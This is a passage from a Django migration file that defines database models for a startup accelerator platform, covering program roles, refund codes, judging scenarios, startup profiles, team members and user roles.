('program_role', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMROLE_MODEL)),
],
options={
'verbose_name': 'Program Role Grant',
'verbose_name_plural': 'Program Role Grants',
'db_table': 'accelerator_programrolegrant',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMROLEGRANT_MODEL',
},
),
migrations.CreateModel(
name='ProgramStartupAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('attribute_type', models.CharField(choices=[('django.forms.CharField', 'Text Line'), ('django.forms.IntegerField', 'Integer'), ('django.forms.FloatField', 'Floating Point Value'), ('django.forms.BooleanField', 'True/False')], help_text='Select the type of information for this attribute', max_length=63, verbose_name='Type')),
('attribute_label', models.CharField(help_text='Provide a human-readable label for this attribute. It must be unique for the selected Program', max_length=127, verbose_name='Label')),
('attribute_description', models.CharField(blank=True, help_text='Provide "help text" for this attribute', max_length=255, verbose_name='Description')),
('admin_viewable', models.BooleanField(default=False, help_text='Can Startup Administrators view this attribute for their own Startups?')),
('non_admin_viewable', models.BooleanField(default=False, help_text='Can Non-Startup Administrators view this attribute for their own Startups?')),
('staff_viewable', models.BooleanField(default=False, help_text='Can MC Staff view this attribute?')),
('finalist_viewable', models.BooleanField(default=False, help_text='Can Other Finalists view this attribute?')),
('mentor_viewable', models.BooleanField(default=False, help_text='Can Mentors view this attribute?')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'db_table': 'accelerator_programstartupattribute',
'ordering': ['program', 'attribute_label'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMSTARTUPATTRIBUTE_MODEL',
},
),
migrations.CreateModel(
name='ProgramStartupStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('startup_status', models.CharField(max_length=255, unique=True)),
('description', models.TextField(blank=True, null=True)),
('startup_list_include', models.BooleanField(default=False, help_text='Include this startup status as a tab in the public startup list')),
('startup_list_tab_title', models.CharField(max_length=50, null=True)),
('startup_list_tab_description', models.TextField(blank=True, help_text='You may use HTML, including links', max_length=1000)),
('startup_list_tab_id', models.CharField(help_text='The slug used in the public URL', max_length=30, null=True)),
('startup_list_tab_order', models.IntegerField(null=True)),
('include_stealth_startup_names', models.BooleanField(default=False)),
('badge_image', sorl.thumbnail.fields.ImageField(blank=True, upload_to='badge_images')),
('badge_display', models.CharField(choices=[('NONE', 'None'), ('STARTUP_LIST', 'Only on startup list'), ('STARTUP_PROFILE', 'Only on startup profile'), ('STARTUP_LIST_AND_PROFILE', 'Startup list and profile')], default='NONE', max_length=30)),
('status_group', models.CharField(blank=True, help_text='Only one status is shown from the same status group; which one is determined by sort order', max_length=50, null=True)),
('sort_order', models.IntegerField(blank=True, help_text='Order', null=True)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Program Startup Statuses',
'db_table': 'accelerator_programstartupstatus',
'ordering': ['program', 'sort_order', 'startup_status'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_PROGRAMSTARTUPSTATUS_MODEL',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=200)),
('question_type', models.CharField(choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=4000)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
],
options={
'db_table': 'accelerator_question',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_QUESTION_MODEL',
},
),
migrations.CreateModel(
name='Reference',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('email', models.CharField(max_length=100, validators=[django.core.validators.EmailValidator()], verbose_name='Email address')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('title', models.CharField(max_length=50)),
('company', models.CharField(max_length=50)),
('reference_hash', models.CharField(max_length=50, unique=True)),
('sent', models.DateTimeField(blank=True, null=True)),
('accessed', models.DateTimeField(blank=True, null=True)),
('submitted', models.DateTimeField(blank=True, null=True)),
('confirmed_first_name', models.CharField(blank=True, max_length=50)),
('confirmed_last_name', models.CharField(blank=True, max_length=50)),
('confirmed_company', models.CharField(blank=True, max_length=50)),
('question_1_rating', models.IntegerField(null=True)),
('question_2_rating', models.IntegerField(null=True)),
('comments', models.TextField(blank=True)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
('requesting_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFERENCE_MODEL',
},
),
migrations.CreateModel(
name='RefundCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('unique_code', models.CharField(max_length=100, unique=True)),
('discount', models.IntegerField(default=0)),
('maximum_uses', models.PositiveIntegerField(blank=True, default=1, help_text='Indicate the maximum number of valid redemptions for this code. A null value is interpreted as unlimited.', null=True, verbose_name='Maximum Uses')),
('notes', models.CharField(blank=True, max_length=300)),
('internal', models.BooleanField(default=False, help_text='If set then this code is intended for internal use (e.g, Early Bird discount) and cannot be entered directly by users.')),
('issued_to', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PARTNER_MODEL)),
('programs', models.ManyToManyField(blank=True, help_text='Which programs is this refund code valid for? If no programs are given, then this code can be applied to any program.', related_name='refund_codes', to=settings.ACCELERATOR_PROGRAM_MODEL)),
],
options={
'verbose_name_plural': 'Refund Codes',
'db_table': 'accelerator_refundcode',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFUNDCODE_MODEL',
},
),
migrations.CreateModel(
name='RefundCodeRedemption',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('refund_status', models.CharField(blank=True, choices=[('not_eligible', 'Not Eligible For Refund'), ('required', 'Refund Due'), ('instant', 'Refund Issued'), ('delayed', 'Refund Pending'), ('failed', 'Refund Failed')], max_length=32)),
('refund_transaction_id', models.CharField(blank=True, max_length=500)),
('refund_amount', models.DecimalField(decimal_places=2, default=Decimal('0.00'), max_digits=7)),
('cycle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
('refund_code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='redemptions', to=settings.ACCELERATOR_REFUNDCODE_MODEL)),
],
options={
'db_table': 'accelerator_refundcoderedemption',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_REFUNDCODEREDEMPTION_MODEL',
},
),
migrations.CreateModel(
name='Scenario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=40)),
('description', models.TextField(blank=True, max_length=512)),
('is_active', models.BooleanField(default=False)),
('panel_size', models.IntegerField(blank=True, default=10)),
('max_panels_per_judge', models.IntegerField(blank=True, null=True)),
('min_panels_per_judge', models.IntegerField(blank=True, default=0)),
('sequence_number', models.PositiveIntegerField(blank=True, help_text='Indicate the order for this scenario within the round', null=True)),
],
options={
'db_table': 'accelerator_scenario',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIO_MODEL',
},
),
migrations.CreateModel(
name='ScenarioApplication',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('priority', models.IntegerField(default=1)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'verbose_name_plural': 'Scenario Applications',
'db_table': 'accelerator_scenarioapplication',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOAPPLICATION_MODEL',
},
),
migrations.CreateModel(
name='ScenarioJudge',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'verbose_name_plural': 'Scenario Judges',
'db_table': 'accelerator_scenariojudge',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOJUDGE_MODEL',
},
),
migrations.CreateModel(
name='ScenarioPreference',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('priority', models.PositiveIntegerField()),
('constraint_type', models.CharField(choices=[('max', 'Maximum number of'), ('min', 'Minimum number of')], max_length=16)),
('entity_type', models.CharField(choices=[('JUDGE', 'judge'), ('APPLICATION', 'application')], max_length=16)),
('entity_set', models.CharField(choices=[('all', 'Judges Overall'), ('is_female', 'Judges that are Female'), ('is_lawyer', 'Judges that are Lawyers'), ('is_executive', 'Judges that are Executives'), ('is_investor', 'Judges that are Investors'), ('group_1', 'Judges in Group 1'), ('group_2', 'Judges in Group 2'), ('group_3', 'Judges in Group 3'), ('group_4', 'Judges in Group 4'), ('group_5', 'Judges in Group 5'), ('most_reliable', 'Judges that are the most reliable'), ('kinda_reliable', 'Judges that are kinda reliable'), ('not_reliable', 'Judges that are not reliable'), ('is_unassigned', 'Judges that were not assigned this round'), ('expert_in_industry', "Judges w/ expertise in the startup's primary industry"), ('also_knows_industry', "Judges w/ secondary expertise in the startup's primary industry"), ('in_program', 'Judges in program startup is applying to'), ('outside_program', 'Judges not in program startup is applying to')], max_length=32)),
('amount', models.PositiveIntegerField(blank=True, default=1, null=True)),
('scenario', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SCENARIO_MODEL)),
],
options={
'db_table': 'accelerator_scenariopreference',
'ordering': ['priority'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SCENARIOPREFERENCE_MODEL',
},
),
migrations.CreateModel(
name='Section',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('heading', models.CharField(blank=True, max_length=255)),
('body', models.TextField(blank=True)),
('include_for', models.CharField(choices=[('EVERYONE', 'Everyone'), ('ANY_SPECIFIED_CATEGORY', 'Any specified category')], default='EVERYONE', max_length=32)),
('sequence', models.PositiveIntegerField(help_text='specify the order of this section in the newsletter')),
('interest_categories', models.ManyToManyField(blank=True, to=settings.ACCELERATOR_INTERESTCATEGORY_MODEL)),
('newsletter', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sections', to=settings.ACCELERATOR_NEWSLETTER_MODEL)),
],
options={
'db_table': 'accelerator_section',
'ordering': ('newsletter', 'sequence'),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SECTION_MODEL',
},
),
migrations.CreateModel(
name='Site',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50, unique=True)),
('security_key', models.CharField(max_length=100)),
('description', models.CharField(blank=True, max_length=500)),
('site_url', models.URLField(blank=True)),
],
options={
'db_table': 'accelerator_site',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITE_MODEL',
},
),
migrations.CreateModel(
name='SiteProgramAuthorization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('startup_profile_base_url', models.URLField()),
('sponsor_profile_base_url', models.URLField()),
('video_base_url', models.URLField()),
('startup_list', models.BooleanField(default=False)),
('startup_profiles', models.BooleanField(default=False)),
('startup_team_members', models.BooleanField(default=False)),
('mentor_list', models.BooleanField(default=False)),
('videos', models.BooleanField(default=False)),
('sponsor_list', models.BooleanField(default=False)),
('sponsor_profiles', models.BooleanField(default=False)),
('sponsor_logos', models.BooleanField(default=False)),
('jobs', models.BooleanField(default=False)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_SITE_MODEL)),
],
options={
'verbose_name_plural': 'Site Program Authorizations',
'db_table': 'accelerator_siteprogramauthorization',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITEPROGRAMAUTHORIZATION_MODEL',
},
),
migrations.CreateModel(
name='SiteRedirectPage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('new_url', models.CharField(max_length=100)),
],
options={
'verbose_name': 'Site Redirect',
'verbose_name_plural': 'Site Redirects',
'db_table': 'pagetype_accelerator_siteredirectpage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_SITEREDIRECTPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Startup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('is_visible', models.BooleanField(default=True, help_text='Startup Profiles will be published to external websites through the the API.')),
('short_pitch', models.CharField(help_text='Your startup in 140 characters or less.', max_length=140)),
('full_elevator_pitch', models.TextField(help_text='Your startup in 500 characters or less.', max_length=500)),
('linked_in_url', models.URLField(blank=True, max_length=100, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, max_length=100, verbose_name='Facebook profile URL')),
('high_resolution_logo', sorl.thumbnail.fields.ImageField(blank=True, upload_to='startup_pics', verbose_name='High Resolution Logo')),
('video_elevator_pitch_url', embed_video.fields.EmbedVideoField(blank=True, help_text='Upload your 1-3 minute video pitch to Vimeo or Youtube. Paste the shared link here.', max_length=100)),
('acknowledgement', models.BooleanField(default=False, help_text='I understand that my Startup Profile is a pre-requisite for applying to any MassChallenge Program')),
('created_datetime', models.DateTimeField(blank=True, null=True)),
('last_updated_datetime', models.DateTimeField(blank=True, null=True)),
('community', models.CharField(blank=True, choices=[('red', 'Red'), ('blue', 'Blue'), ('green', 'Green')], max_length=64)),
('profile_background_color', models.CharField(blank=True, default='217181', max_length=7, validators=[django.core.validators.RegexValidator('^([0-9a-fA-F]{3}|[0-9a-fA-F]{6}|)$', 'Color must be 3 or 6-digit hexecimal number, such as FF0000 for red.')])),
('profile_text_color', models.CharField(blank=True, default='FFFFFF', max_length=7, validators=[django.core.validators.RegexValidator('^([0-9a-fA-F]{3}|[0-9a-fA-F]{6}|)$', 'Color must be 3 or 6-digit hexecimal number, such as FF0000 for red.')])),
('location_national', models.CharField(blank=True, default='', help_text='Please specify the country where your main office (headquarters) is located', max_length=100)),
('location_regional', models.CharField(blank=True, default='', help_text='Please specify the state, region or province where your main office (headquarters) is located (if applicable).', max_length=100)),
('location_city', models.CharField(blank=True, default='', help_text='Please specify the city where your main office (headquarters) is located. (e.g. Boston)', max_length=100)),
('location_postcode', models.CharField(blank=True, default='', help_text='Please specify the postal code for your main office (headquarters). (ZIP code, Postcode, codigo postal, etc.)', max_length=100)),
('date_founded', models.CharField(blank=True, help_text='Month and Year when your startup was founded.', max_length=100)),
('landing_page', models.CharField(blank=True, max_length=255, null=True)),
('additional_industries', models.ManyToManyField(blank=True, db_table='accelerator_startup_related_industry', help_text='You may select up to 5 related industries.', related_name='secondary_startups', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Additional Industries')),
('currency', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_CURRENCY_MODEL)),
('organization', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='startups', to=settings.ACCELERATOR_ORGANIZATION_MODEL)),
('primary_industry', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='startups', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL, verbose_name='Primary Industry categorization')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startups',
'db_table': 'accelerator_startup',
'ordering': ['organization__name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUP_MODEL',
},
),
migrations.CreateModel(
name='StartupAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('attribute_value', models.TextField(help_text='Stored text representation of the value', verbose_name='Value')),
('attribute', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMSTARTUPATTRIBUTE_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Attributes',
'db_table': 'accelerator_startupattribute',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPATTRIBUTE_MODEL',
},
),
migrations.CreateModel(
name='StartupCycleInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('cycle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL)),
],
options={
'db_table': 'accelerator_startupcycleinterest',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPCYCLEINTEREST_MODEL',
},
),
migrations.CreateModel(
name='StartupLabel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('label', models.CharField(max_length=255)),
('startups', models.ManyToManyField(blank=True, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPLABEL_MODEL',
},
),
migrations.CreateModel(
name='StartupMentorRelationship',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('status', models.CharField(choices=[('Confirmed', 'Confirmed'), ('In Discussions With', 'In Discussions With'), ('Desired', 'Desired')], default='Desired', max_length=32)),
('primary', models.BooleanField(default=False)),
('mentor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startup Mentor Relationships',
'db_table': 'accelerator_startupmentorrelationship',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPMENTORRELATIONSHIP_MODEL',
},
),
migrations.CreateModel(
name='StartupMentorTrackingRecord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('other_mentors', models.TextField(blank=True, help_text='Add any mentors you meet with who are not listed in the MassChallenge Mentor Directory. Please provide their name, company, and email address below.', null=True, verbose_name='Additional Mentors')),
('notes', models.TextField(blank=True, help_text='Submit the three goals you plan to work on with your mentors during the accelerator program.', null=True, verbose_name='Program Goals')),
('mentors', models.ManyToManyField(help_text="Select the Mentors you would like to work with during the program. Start typing a Mentor's name; if they are in the Mentor Directory, their name should appear as you type. If you don't find the person you are looking for, use 'Other Mentors' below.", through='accelerator.StartupMentorRelationship', to=settings.AUTH_USER_MODEL, verbose_name='Registered Mentors')),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name': 'Mentor Tracking Record',
'verbose_name_plural': 'Mentor Tracking Records',
'db_table': 'accelerator_startupmentortrackingrecord',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPMENTORTRACKINGRECORD_MODEL',
},
),
migrations.CreateModel(
name='StartupOverrideGrant',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('program_override', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMOVERRIDE_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Override Grants',
'db_table': 'accelerator_startupoverridegrant',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPOVERRIDEGRANT_MODEL',
},
),
migrations.CreateModel(
name='StartupProgramInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('order', models.PositiveIntegerField(db_index=True, editable=False)),
('applying', models.BooleanField(default=False)),
('interest_level', models.CharField(blank=True, choices=[('g', 'Definitely will participate'), ('w', 'Will participate'), ('p', 'Likely will participate'), ('n', 'Might not participate'), ('l', "Likely won't participate")], max_length=64, null=True)),
('program', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
('startup_cycle_interest', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUPCYCLEINTEREST_MODEL)),
],
options={
'db_table': 'accelerator_startupprograminterest',
'ordering': ['order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPPROGRAMINTEREST_MODEL',
},
),
migrations.CreateModel(
name='StartupRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
],
options={
'db_table': 'accelerator_startuprole',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPROLE_MODEL',
},
),
migrations.CreateModel(
name='StartupStatus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('program_startup_status', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMSTARTUPSTATUS_MODEL)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
],
options={
'verbose_name_plural': 'Startup Statuses',
'db_table': 'accelerator_startupstatus',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPSTATUS_MODEL',
},
),
migrations.CreateModel(
name='StartupTeamMember',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('title', models.CharField(blank=True, max_length=60)),
('startup_administrator', models.BooleanField(help_text='You have to have at least one administrator')),
('is_contact', models.BooleanField(default=False, help_text='A secondary contact for the startup')),
('primary_contact', models.BooleanField(default=False, help_text='You may only have one primary contact')),
('technical_contact', models.BooleanField(default=False)),
('marketing_contact', models.BooleanField(default=False)),
('financial_contact', models.BooleanField(default=False)),
('legal_contact', models.BooleanField(default=False)),
('product_contact', models.BooleanField(default=False)),
('design_contact', models.BooleanField(default=False)),
('display_on_public_profile', models.BooleanField(default=True)),
('founder', models.NullBooleanField(default=False)),
('startup', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_STARTUP_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Startup Team Members',
'db_table': 'accelerator_startupteammember',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_STARTUPTEAMMEMBER_MODEL',
},
),
migrations.CreateModel(
name='UserLabel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('label', models.CharField(max_length=255)),
('users', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_userlabel',
'ordering': ['label'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERLABEL_MODEL',
},
),
migrations.CreateModel(
name='UserLegalCheck',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('accepted', models.BooleanField(default=False)),
('legal_check', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_set', to=settings.ACCELERATOR_LEGALCHECK_MODEL)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='legalcheck_set', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'User Legal Check',
'db_table': 'accelerator_userlegalcheck',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERLEGALCHECK_MODEL',
},
),
migrations.CreateModel(
name='UserRole',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('url_slug', models.CharField(max_length=30)),
('sort_order', models.PositiveIntegerField()),
],
options={
'db_table': 'accelerator_userrole',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERROLE_MODEL',
},
),
migrations.CreateModel(
name='UserRoleMenu',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('program_status', models.CharField(blank=True, choices=[('upcoming', 'Upcoming'), ('active', 'Active'), ('ended', 'Ended'), ('hidden', 'Hidden')], max_length=64, null=True)),
('program', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAM_MODEL, verbose_name='Program')),
('program_family', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_PROGRAMFAMILY_MODEL, verbose_name='Program Family')),
('user_role', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_USERROLE_MODEL, verbose_name='User Role')),
],
options={
'verbose_name': 'User Role Menu',
'verbose_name_plural': 'User Role Menus',
'db_table': 'pagetype_accelerator_userrolemenu',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_USERROLEMENU_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Allocator',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
